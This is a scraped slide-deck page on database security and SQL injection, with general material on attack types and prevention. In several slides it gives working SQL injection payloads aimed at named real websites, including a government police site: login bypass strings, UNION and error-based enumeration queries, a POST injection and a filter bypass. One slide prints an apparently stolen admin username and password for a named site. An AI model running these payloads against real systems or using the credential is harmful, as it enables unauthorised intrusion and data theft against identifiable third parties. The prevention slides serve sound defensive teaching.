Database and Database Security..
Download as PPTX, PDF7 likes2,239 views
This document discusses database security and SQL injection attacks. It begins by defining databases and how they are interacted with through queries, stored procedures, and integration with programming languages. It then explains different types of database attacks like SQL injection, privilege escalation, and denial of service. Specific examples of SQL injection are provided, demonstrating how injection can occur through input values, errors, and POST requests. Methods for detecting and preventing SQL injection are discussed, including input validation, prepared statements, and firewalls. Live examples of SQL injection vulnerabilities are also shown.
![Union based attack
http://greenforce.com.pk/page.aspx?page_id=24
+UNION+ALL+SELECT+null,null,@@version,null,null,null,nul
l-- -
http://www.philatourism.com/page.aspx?id=-3 UNION ALL
SELECT table_name,null,null,null,null,null from
information_schema.tables—
http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all
select '1',null –
Code
select * from tblName where
id=‗‖+RequestQueryString[‗id‘]+‖‘;](https://image.slidesharecdn.com/rummykhan-140315145800-phpapp02/85/Database-and-Database-Security-22-320.jpg)
![Error Based Attack
http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and
1=convert(int,@@version)-- -&category_id=2
http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='adminlogin'
and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
http://www.grabbbit.com/admin/login.aspx
userid admin
password grabbbit$
Code
Select column1,column2,column3, from table1 join table2 on table1.column1 =
table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;](https://image.slidesharecdn.com/rummykhan-140315145800-phpapp02/85/Database-and-Database-Security-23-320.jpg)
![POST Sql Injection
url:
http://haryanapolice.gov.in/police/pressreleases/s
earch.asp
Post
text1=rummy'&text2=11/11/2010&SUBMIT=search
Code
select * from tablename where text1=
Request.Form[―text1"].ToString() and text2=
Request.Form[―text1"].ToString();](https://image.slidesharecdn.com/rummykhan-140315145800-phpapp02/85/Database-and-Database-Security-25-320.jpg)
Database and Database Security..
- 2. DATABASE & DATABASE SECURITY BY REHAN MANZOOR
- 3. What actually is a database Code and Filing concept +
- 7. How we Interact (Direct Queries)
- 12. Static Apps
- 13. Dynamic Apps
- 14. Need in CMS
- 15. How We Integrate Well that is the real question how we integrate.. It create a problem when we don‘t attach app with a database correctly.. Code is important
- 16. Contents continued.. Database Attacks What is a Database Attack Explanation OWASP Rating (damage rate) Destruction of SQL injection History Reviews Recent bidding in underground
- 17. Database Attacks Excessive Privileges Privileges abuse Unauthorized privilege elevation Platform Vulnerabilities Sql Injection Weak Audit Denial of Service
- 18. Top 10 vuln by OWASP
- 19. Destruction of SQL Injection Attack Heartland Payment Systems This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft. TJX More than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.
- 20. Recent Bidding in Underground
- 21. Login on Live Sites http://www.equinet.ch/fr/gestion/login.php 1' OR '1'='1 http://lionsclubofwashim.co.in/admin.php 1' OR '1'='1 admin.axilbusiness.in 1' OR '1'='1 http://www.anemos.in/admin/ 1' OR '1'='1 Query Code CODE select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
- 22. Union based attack http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,nul l-- - http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables— http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null – Code select * from tblName where id=‗‖+RequestQueryString[‗id‘]+‖‘;
- 23. Error Based Attack http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- - http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2 http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown http://www.grabbbit.com/admin/login.aspx userid admin password grabbbit$ Code Select column1,column2,column3, from table1 join table2 on table1.column1 = table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
- 24. Blind Attack fgcineplex.com.sg/Images/slideshow/sizzlings oul.php Code well query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union
- 25. POST Sql Injection url: http://haryanapolice.gov.in/police/pressreleases/s earch.asp Post text1=rummy'&text2=11/11/2010&SUBMIT=search Code select * from tablename where text1= Request.Form[―text1"].ToString() and text2= Request.Form[―text1"].ToString();
- 26. Why Sql Injection Possible Who is responsible Database or Programmer Why Not To Blame Database Database Secure Nature Lack of awareness No research base study Lack of interest Non professional coders
- 27. Detection of SQL Injection Manual Check Why How By Whom Automated Check Tools Scanners
- 28. Securing From SQL Injection Learn About it Firewalls By Code Don‘t Disclose any parameter as possible Giving session user least possible rights Blacklisting evil keywords for the session user User input validation Using prepared statements
- 29. More on Firewalls USE Of Firewall As it is Customized Buffer overflows Null bytes Difference between a normal user and Hacker
- 30. Buffer Overflows Live example https://www.qmensolutions.com/remote_suppo rt_packs.php?packs=9%27--%20- Bypassing from keyword
- 31. Live Hack Of A Website http://aquaservices.co.in/
- 32. Conclusion Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.